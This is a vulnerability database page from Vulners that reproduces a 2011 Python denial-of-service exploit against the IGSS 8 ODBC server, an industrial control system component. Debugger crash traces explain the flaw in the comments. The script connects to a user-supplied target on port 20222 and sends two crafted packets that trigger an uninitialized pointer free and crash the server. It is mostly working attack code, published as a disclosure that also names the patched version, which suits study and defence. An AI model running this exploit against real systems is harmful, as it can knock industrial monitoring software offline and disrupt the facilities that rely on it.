Vulners
Lucene search
IGSS 8 ODBC Server Denial Of Service
`#!/usr/bin/python
# igss.py
# IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS
# Jeremy Brown / jbrown at patchtuesday dot org
# Mar 2011
#
# There are multiple remote uninitialized pointer free conditions in IGSS's ODBC
# server. By sending a specially crafted packet to listening port 20222, it is
# possible to crash the server. Execution of arbitrary code is unlikely.
#
# Note: IGSS uses a 3rd party ODBC driver kit from Dr. DeeBee.
#
# HEAP[Odbcixv8se.exe]: Invalid allocation size - 8899AABB (exceeded 7ffdefff)
# HEAP[Odbcixv8se.exe]: Invalid Address specified to RtlGetUserInfoHeap( 00150000, 00175008 )
# (f10.cf8): Break instruction exception - code 80000003 (first chance)
# eax=00175000 ebx=00175000 ecx=7c91ead5 edx=0102fc55 esi=00150000 edi=00175008
# eip=7c90120e esp=0102fe58 ebp=0102fe5c iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
# ntdll!DbgBreakPoint:
# 7c90120e cc int 3
# 0:002> g
# HEAP[Odbcixv8se.exe]: Invalid Address specified to RtlGetUserInfoHeap( 00150000, 00175008 )
# (f10.cf8): Break instruction exception - code 80000003 (first chance)
# eax=00175000 ebx=00175000 ecx=7c91ead5 edx=0102fc55 esi=00150000 edi=00175008
# eip=7c90120e esp=0102fe58 ebp=0102fe5c iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
# ntdll!DbgBreakPoint:
# 7c90120e cc int 3
# 0:002> g
# Heap corruption detected at 00175008
# Heap corruption detected at 00177F78
# Heap corruption detected at 001733D8
# (f10.cf8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00173398 ebx=00000000 ecx=feeefeee edx=001733d8 esi=00173390 edi=00150000
# eip=7c9276fc esp=0102fc34 ebp=0102fd08 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# ntdll!RtlFreeHeapSlowly+0x392:
# 7c9276fc 8901 mov dword ptr [ecx],eax ds:0023:feeefeee=????????
# 0:002> kb
# ChildEBP RetAddr Args to Child
# 0102fd08 7c96f85a 00150000 50000061 00173398 ntdll!RtlFreeHeapSlowly+0x392
# 0102fd7c 7c94bc4c 00150000 50000061 00173398 ntdll!RtlDebugFreeHeap+0x193
# 0102fe64 7c927573 00150000 40000061 00173398 ntdll!RtlFreeHeapSlowly+0x37
# 0102ff34 7c80fd4f 00150000 00000001 00173398 ntdll!RtlFreeHeap+0xf9
# *** ERROR: Module load completed but symbols could not be loaded for Odbcixv8se.exe
# 0102ff7c 0044531d 00aa001c 0102ffb4 00443abd kernel32!GlobalFree+0xb5
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 0102ff88 00443abd 00173398 00000014 00000016 Odbcixv8se+0x4531d
# 0102ffb4 7c80b729 00000710 00000000 00000000 Odbcixv8se+0x43abd
# 0102ffec 00000000 004436f0 00000710 00000000 kernel32!BaseThreadStart+0x37
#
# feeefeee = freed memory
#
# RtlFreeHeap() takes three arguments:
# HeapHandle --> 0x173398
# Flags --> 0x00000001
# HeapBase --> 0x173398
#
# HeapBase is the pointer to the memory block that is going to be freed.
#
# 0:002> dd 173398
# 00173398 001733d8 -----------------------------
# 001733a8 feeefeee feeefeee feeefeee feeefeee -
# 001733b8 feeefeee feeefeee feeefeee feeefeee -
# 001733c8 feeefeee feeefeee feeefeee feeefeee -
# 001733d8 feeefeee feeefeee feeefeee feeefeee <-
# 001733e8 feeefeee feeefeee feeefeee feeefeee
# 001733f8 feeefeee feeefeee feeefeee feeefeee
# 00173408 feeefeee feeefeee feeefeee feeefeee
#
# In this example, the pointer to free happens to point to free memory.
#
# Tested IGSS 8 (Odbcixv8se.exe version 10299) on Windows
#
# Fixed version: IGSS 8 (Odbcixv8se.exe version 11003)
# http://www.syware.com/download/drdeebee/gold_bug.txt
#
import sys
import socket
req_1=(
"\x00\x00\x00\x34"
"\x02\x00\x00\x00\x02\x00\x00\x00\x02\x2e\x00\x00\x00\x00\x19\x49"
"\x47\x53\x53\x33\x32\x76\x38\x20\x4f\x44\x42\x43\x20\x4e\x65\x74"
"\x77\x6f\x72\x6b\x20\x44\x53\x00\x00\x00\x00\x02\x20\x00\x00\x00"
"\x00\x02\x20\x00"
)
req_2=(
"\x00\x00\x00\xff"+ # length
"\x16"+ # switch code
"\x77" * 254+ # begin query here
"\x88\x99\xaa\xbb" # test
)
if len(sys.argv)!=2:
print "Usage: %s <target>" % sys.argv[0]
sys.exit(0)
target=sys.argv[1]
port=20222
cs=target,port
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(cs)
sock.settimeout(1)
sock.send(req_1)
try:
resp=sock.recv(1024)
print "resp_1 = %s\n"%resp.encode("hex")
except: pass
sock.send(req_2)
try:
resp=sock.recv(1024)
print "resp_2 = %s\n"%resp.encode("hex")
except: pass
sock.close()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Mar 2011 00:00Current
0.1Low risk
Vulners AI Score0.1